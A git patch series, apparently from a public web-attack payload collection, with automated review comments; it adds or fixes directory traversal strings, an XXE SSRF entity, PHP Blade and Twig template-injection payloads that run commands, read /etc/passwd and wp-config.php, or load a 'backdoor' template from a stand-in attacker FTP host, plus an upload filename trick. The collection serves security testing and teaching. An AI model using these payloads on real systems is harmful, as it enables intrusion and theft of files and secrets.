From aa85b80aced70b16ab8e99fc42cb111ac6681729 Mon Sep 17 00:00:00 2001
From: piranha <96269065+piranhaAD@users.noreply.github.com>
Date: Tue, 9 Sep 2025 19:16:45 +0100
Subject: [PATCH 1/5] correction of xxe ssrf payload
remove the % from the payload as it's not a parametrized entity
---
XXE Injection/README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/XXE Injection/README.md b/XXE Injection/README.md
index 6c02302290..734588e68d 100644
--- a/XXE Injection/README.md
+++ b/XXE Injection/README.md
@@ -155,7 +155,7 @@ XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo
-
+
]>
&xxe;
```
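Review bot: the `-` and `+` lines of this hunk carry no visible content, so the `<!ENTITY>` declaration whose `%` the commit message says was removed cannot be checked from the hunk itself; the surviving context line `&xxe;` is a general-entity reference, which only works if the declaration is written without the `%` prefix, since a parameter entity can only be referenced as `%xxe;` and only inside the DTD. Worth re-reading README lines 155-161 in the rendered file to confirm the declaration and the `&xxe;` reference now agree.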
From 9a08798848fc78bc1c6f9c9753f8cd8a1bfb74a6 Mon Sep 17 00:00:00 2001
From: Aaditya <146899562+Aaditya-Chunekar@users.noreply.github.com>
Date: Wed, 22 Oct 2025 19:44:31 +0530
Subject: [PATCH 2/5] hacktoberfest - Update YouTube.md with new resources
Added LaurieWired and Tib3rius YouTube channels.
---
_LEARNING_AND_SOCIALS/YOUTUBE.md | 3 +++
1 file changed, 3 insertions(+)
diff --git a/_LEARNING_AND_SOCIALS/YOUTUBE.md b/_LEARNING_AND_SOCIALS/YOUTUBE.md
index c6223bf879..c00951cebd 100644
--- a/_LEARNING_AND_SOCIALS/YOUTUBE.md
+++ b/_LEARNING_AND_SOCIALS/YOUTUBE.md
@@ -19,6 +19,7 @@
- [Jack Rhysider - Darknet Diaries](https://www.youtube.com/@JackRhysider)
- [John Hammond - Wargames and CTF writeups](https://www.youtube.com/channel/UCVeW9qkBjo3zosnqUbG7CFw)
- [Laluka - OffenSkill - Sharing is Caring](https://www.youtube.com/@TheLaluka)
+- [LaurieWired - reverse engineering and research](https://www.youtube.com/@lauriewired)
- [LiveOverflow - Explore weird machines...](https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w)
- [Murmus CTF - Weekly live streamings](https://www.youtube.com/channel/UCUB9vOGEUpw7IKJRoR4PK-A)
- [Nahamsec](https://www.youtube.com/c/Nahamsec)
@@ -30,6 +31,7 @@
- [STÖK](https://www.youtube.com/c/STOKfredrik)
- [The Cyber Mentor](https://www.youtube.com/channel/UC0ArlFuFYMpEewyRBzdLHiw)
- [The Hated one](https://www.youtube.com/channel/UCjr2bPAyPV7t35MvcgT3W8Q)
+- [Tib3rius - CTF walkthroughs, deep dives, web app hacking, and more!](https://www.youtube.com/@tib3rius)
- [xct hacks](https://www.youtube.com/@xct_de)
## Conferences
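Review bot: the new Tib3rius descriptor ("CTF walkthroughs, deep dives, web app hacking, and more!") is longer and more promotional than the neighbouring entries, which use a short phrase after the dash; trim it to something like `- [Tib3rius - CTF walkthroughs and web app hacking](https://www.youtube.com/@tib3rius)` and drop the exclamation mark. Alphabetical placement between "The Hated one" and "xct hacks" is correct.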
@@ -62,3 +64,4 @@
- [EP003: Red Team | HACKING GOOGLE](https://youtu.be/TusQWn2TQxQ)
- [EP004: Bug Hunters | HACKING GOOGLE](https://youtu.be/IoXiXlCNoXg)
- [EP005: Project Zero | HACKING GOOGLE](https://youtu.be/My_13FXODdU)
+
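Review bot: the `+` line adds a trailing blank line at end of file, which markdown linters flag and which PATCH 5/5 in this same series removes again; drop it from this commit (or squash the two) so the series does not add and then revert the same line.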
From 3359054ecf124357973baf890c9a1991dd3a8baa Mon Sep 17 00:00:00 2001
From: Reelix
Date: Fri, 31 Oct 2025 14:22:13 +0200
Subject: [PATCH 3/5] Fixed missing {FILE} placeholders
The bottom few options were missing the {FILE} placeholders.
This fixes them.
---
.../Intruder/traversals-8-deep-exotic-encoding.txt | 14 +++++++-------
1 file changed, 7 insertions(+), 7 deletions(-)
diff --git a/Directory Traversal/Intruder/traversals-8-deep-exotic-encoding.txt b/Directory Traversal/Intruder/traversals-8-deep-exotic-encoding.txt
index 5fbaded549..05ea1a92c5 100644
--- a/Directory Traversal/Intruder/traversals-8-deep-exotic-encoding.txt
+++ b/Directory Traversal/Intruder/traversals-8-deep-exotic-encoding.txt
@@ -877,11 +877,11 @@
/..\..\\..\..\\..\..\\\{FILE}
/..\..\\..\..\\..\..\\..\\\{FILE}
/..\..\\..\..\\..\..\\..\..\\\{FILE}
-/\..%2f
-/\..%2f\..%2f
-/\..%2f\..%2f\..%2f
-/\..%2f\..%2f\..%2f\..%2f
-/\..%2f\..%2f\..%2f\..%2f\..%2f
-/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f
-/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f
+/\..%2f{FILE}
+/\..%2f\..%2f{FILE}
+/\..%2f\..%2f\..%2f{FILE}
+/\..%2f\..%2f\..%2f\..%2f{FILE}
+/\..%2f\..%2f\..%2f\..%2f\..%2f{FILE}
+/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f{FILE}
+/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f{FILE}
/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f{FILE}
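Review bot: the seven corrected lines now match the 8-deep entry on the last context line and the `\..\\` block above it, so the fix looks complete for this group; since the bug was a missing placeholder, it is worth running `grep -vn '{FILE}'` over the whole file before merging to confirm no other entries still end without it, because an entry without the placeholder makes Intruder send a bare traversal prefix that can never hit a file.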
From 832b54fd951536bb329458d52dfaa366988b4f02 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sat, 15 Nov 2025 17:11:42 +0100
Subject: [PATCH 4/5] Syntax Highlighting SSTI
---
GraphQL Injection/README.md | 1 +
Server Side Template Injection/PHP.md | 40 ++++++++++++++++--------
Server Side Template Injection/Python.md | 1 +
Upload Insecure Files/README.md | 1 +
4 files changed, 30 insertions(+), 13 deletions(-)
diff --git a/GraphQL Injection/README.md b/GraphQL Injection/README.md
index 4e69a37baa..0192f55adf 100644
--- a/GraphQL Injection/README.md
+++ b/GraphQL Injection/README.md
@@ -38,6 +38,7 @@
- [nicholasaleks/CrackQL](https://github.com/nicholasaleks/CrackQL) - A GraphQL password brute-force and fuzzing utility
- [nicholasaleks/graphql-threat-matrix](https://github.com/nicholasaleks/graphql-threat-matrix) - GraphQL threat framework used by security professionals to research security gaps in GraphQL implementations
- [dolevf/graphql-cop](https://github.com/dolevf/graphql-cop) - Security Auditor Utility for GraphQL APIs
+- [dolevf/graphw00f](https://github.com/dolevf/graphw00f) - GraphQL Server Engine Fingerprinting utility
- [IvanGoncharov/graphql-voyager](https://github.com/IvanGoncharov/graphql-voyager) - Represent any GraphQL API as an interactive graph
- [Insomnia](https://insomnia.rest/) - Cross-platform HTTP and GraphQL Client
diff --git a/Server Side Template Injection/PHP.md b/Server Side Template Injection/PHP.md
index f8502ad68a..cc3618c315 100644
--- a/Server Side Template Injection/PHP.md
+++ b/Server Side Template Injection/PHP.md
@@ -21,21 +21,34 @@
## Templating Libraries
-| Template Name | Payload Format |
-| -------------- | --------- |
-| Laravel Blade | `{{ }}` |
-| Latte | `{var $X=""}{$X}` |
-| Mustache | `{{ }}` |
-| Plates | `= ?>` |
-| Smarty | `{ }` |
-| Twig | `{{ }}` |
+| Template Name | Payload Format |
+| --------------- | --------- |
+| Blade (Laravel) | `{{ }}` |
+| Latte | `{var $X=""}{$X}` |
+| Mustache | `{{ }}` |
+| Plates | `= ?>` |
+| Smarty | `{ }` |
+| Twig | `{{ }}` |
+
+## Blade
+
+[Official website](https://laravel.com/docs/master/blade)
+> Blade is the simple, yet powerful templating engine that is included with Laravel.
+
+The string `id` is generated with `{{implode(null,array_map(chr(99).chr(104).chr(114),[105,100]))}}`.
+
+```php
+{{passthru(implode(null,array_map(chr(99).chr(104).chr(114),[105,100])))}}
+```
+
+---
## Smarty
[Official website](https://www.smarty.net/docs/en/)
> Smarty is a template engine for PHP.
-```python
+```php
{$smarty.version}
{php}echo `id`;{/php} //deprecated in smarty v3
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"",self::clearConfig())}
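Review bot: the new Blade section says what `{{implode(null,array_map(chr(99).chr(104).chr(114),[105,100]))}}` produces but not why it is written that way; add that `chr(99).chr(104).chr(114)` spells `chr` and `[105,100]` spells `id`, so the whole payload contains no quote characters, which is the property a reader needs when quotes are filtered. Two smaller points on the same lines: `implode(null, ...)` passes null to a string parameter and raises a deprecation notice on PHP 8.1+, and the single-argument form `implode(array_map(...))` avoids both the null and the quotes; and the Plates row reads `= ?>` in both the old and new table, which looks like the leading `<?` of the native `<?= ?>` short-echo tag that Plates relies on has been lost, so check the source file. The fence change from `python` to `php` for the Smarty block is right.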
@@ -52,7 +65,7 @@
### Twig - Basic Injection
-```python
+```php
{{7*7}}
{{7*'7'}} would result in 49
{{dump(app)}}
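Review bot: these blocks are Twig template syntax rather than PHP, and GitHub's highlighter has a `twig` language, so ```twig would be the accurate tag here and for the other Twig blocks in this file that this patch retags to `php`. Separately, the line `{{7*'7'}} would result in 49` mixes a prose remark into the code block; either move the remark into a Twig comment (`{# 49 #}`) or into the text above the fence.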
@@ -62,7 +75,7 @@
### Twig - Template Format
-```python
+```php
$output = $twig > render (
'Dear' . $_GET['custom_greeting'],
array("first_name" => $user.first_name)
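Review bot: this block is PHP, so the retag is appropriate, but now that it is highlighted as PHP the syntax errors stand out: `$twig > render (` should be `$twig->render(` and `$user.first_name` should be `$user->first_name` (or `$user['first_name']`). Fixing those in the same change would keep the example copy-pasteable.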
@@ -76,14 +89,14 @@ $output = $twig > render (
### Twig - Arbitrary File Reading
-```python
+```php
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{include("wp-config.php")}}
```
### Twig - Code Execution
-```python
+```php
{{self}}
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
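Review bot: both retagged blocks in this hunk need a version or context caveat next to the fence. The `_self.env.*` payloads (`setCache`, `loadTemplate`, `registerUndefinedFilterCallback`, `getFilter`) only work on Twig 1.x; from Twig 2.0 `_self` yields the template name rather than the template object, so `.env` is unreachable. In the file-reading block, `file_excerpt` is not a core Twig filter but comes from Symfony's Twig bridge code extension, and `include("wp-config.php")` only succeeds if the configured loader can resolve that path; a one-line note on when each applies would stop readers from concluding a target is not vulnerable when a payload simply does not fit the stack. The `"@` trailing the first payload also deserves a word, since it reads as a leftover from a specific injection context.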
@@ -249,4 +262,5 @@ layout template:
## References
+- [Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere- YesWeHack - March 24, 2025](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation)
- [Server Side Template Injection (SSTI) via Twig escape handler - March 21, 2024](https://github.com/getgrav/grav/security/advisories/GHSA-2m7x-c7px-hp58)
diff --git a/Server Side Template Injection/Python.md b/Server Side Template Injection/Python.md
index 87137471de..056d605710 100644
--- a/Server Side Template Injection/Python.md
+++ b/Server Side Template Injection/Python.md
@@ -406,3 +406,4 @@ PoC :
- [Exploring SSTI in Flask/Jinja2, Part II - Tim Tomes - March 11, 2016](https://web.archive.org/web/20170710015954/https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
- [Jinja2 template injection filter bypasses - Sebastian Neef - August 28, 2017](https://0day.work/jinja2-template-injection-filter-bypasses/)
- [Python context free payloads in Mako templates - podalirius - August 26, 2021](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/)
+- [The minefield between syntaxes: exploiting syntax confusions in the wild - YesWeHack - October 17, 2025](https://www.yeswehack.com/learn-bug-bounty/syntax-confusion-ambiguous-parsing-exploits)
diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md
index 2047d0c3c6..75f5aa94b2 100644
--- a/Upload Insecure Files/README.md
+++ b/Upload Insecure Files/README.md
@@ -102,6 +102,7 @@ Other extensions that can be abused to trigger other vulnerabilities.
* Right to Left Override (RTLO): `name.%E2%80%AEphp.jpg` will became `name.gpj.php`.
* Slash: `file.php/`, `file.php.\`, `file.j\sp`, `file.j/sp`
* Multiple special characters: `file.jsp/././././.`
+ * UTF8 filename: `Content-Disposition: form-data; name="anyBodyParam"; filename*=UTF8''myfile%0a.txt`
* On Windows OS, `include`, `require` and `require_once` functions will convert "foo.php" followed by one or more of the chars `\x20` ( ), `\x22` ("), `\x2E` (.), `\x3C` (<), `\x3E` (>) back to "foo.php".
* On Windows OS, `fopen` function will convert "foo.php" followed by one or more of the chars `\x2E` (.), `\x2F` (/), `\x5C` (\) back to "foo.php".
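Review bot: the charset token in the added `filename*=UTF8''myfile%0a.txt` entry should be `UTF-8`, the registered name that the RFC 5987 `ext-value` form uses, since strict parsers may reject `UTF8`. The descriptor "UTF8 filename" also undersells the trick: the point is that multipart parsers percent-decode the `filename*` parameter, so `%0a` becomes a literal newline in the stored name through a code path that the plain `filename=` parameter does not take; saying so, and naming it as the RFC 5987 `filename*` parameter, would make the entry consistent with the explanatory style of the neighbouring bullets.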
From ca50df233621323dc76273ee94f9e59f176fd6de Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sat, 15 Nov 2025 17:36:38 +0100
Subject: [PATCH 5/5] Fix markdown linting
---
XXE Injection/README.md | 7 +++++++
_LEARNING_AND_SOCIALS/YOUTUBE.md | 1 -
2 files changed, 7 insertions(+), 1 deletion(-)
diff --git a/XXE Injection/README.md b/XXE Injection/README.md
index 734588e68d..eb642671e9 100644
--- a/XXE Injection/README.md
+++ b/XXE Injection/README.md
@@ -68,6 +68,13 @@ Basic entity test, when the XML parser parses the external entities the result s
It might help to set the `Content-Type: application/xml` in the request when sending XML payload to the server.
+These are different types of entities in XML:
+
+| Type | Prefix | Where usable |
+| ---------------- | -------- | --------------------------- |
+| General entity | `&name;` | Inside XML document content |
+| Parameter entity | `%name;` | Only inside the DTD |
+
## Exploiting XXE to Retrieve Files
### Classic XXE
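Review bot: the table is accurate, but the lead-in "These are different types of entities in XML:" reads awkwardly; "XML has two kinds of entities:" is clearer. It would also help to add one sentence after the table saying that parameter entities are the mechanism that lets a DTD pull in an external DTD which declares further entities, since that is what the `%name;` form is used for in XXE payloads and it explains why the SSRF payload corrected in PATCH 1/5 must use a general entity to be referenced as `&xxe;` in the document body.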
diff --git a/_LEARNING_AND_SOCIALS/YOUTUBE.md b/_LEARNING_AND_SOCIALS/YOUTUBE.md
index c00951cebd..7fea856c17 100644
--- a/_LEARNING_AND_SOCIALS/YOUTUBE.md
+++ b/_LEARNING_AND_SOCIALS/YOUTUBE.md
@@ -64,4 +64,3 @@
- [EP003: Red Team | HACKING GOOGLE](https://youtu.be/TusQWn2TQxQ)
- [EP004: Bug Hunters | HACKING GOOGLE](https://youtu.be/IoXiXlCNoXg)
- [EP005: Project Zero | HACKING GOOGLE](https://youtu.be/My_13FXODdU)
-